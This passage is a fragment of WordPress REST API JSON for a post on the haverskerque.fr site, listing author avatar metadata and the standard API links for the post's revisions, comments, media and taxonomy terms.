d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/636","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=636"}],"version-history":[{"count":4,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/636\/revisions"}],"predecessor-version":[{"id":8305,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/636\/revisions\/8305"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=636"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=636"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=636"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}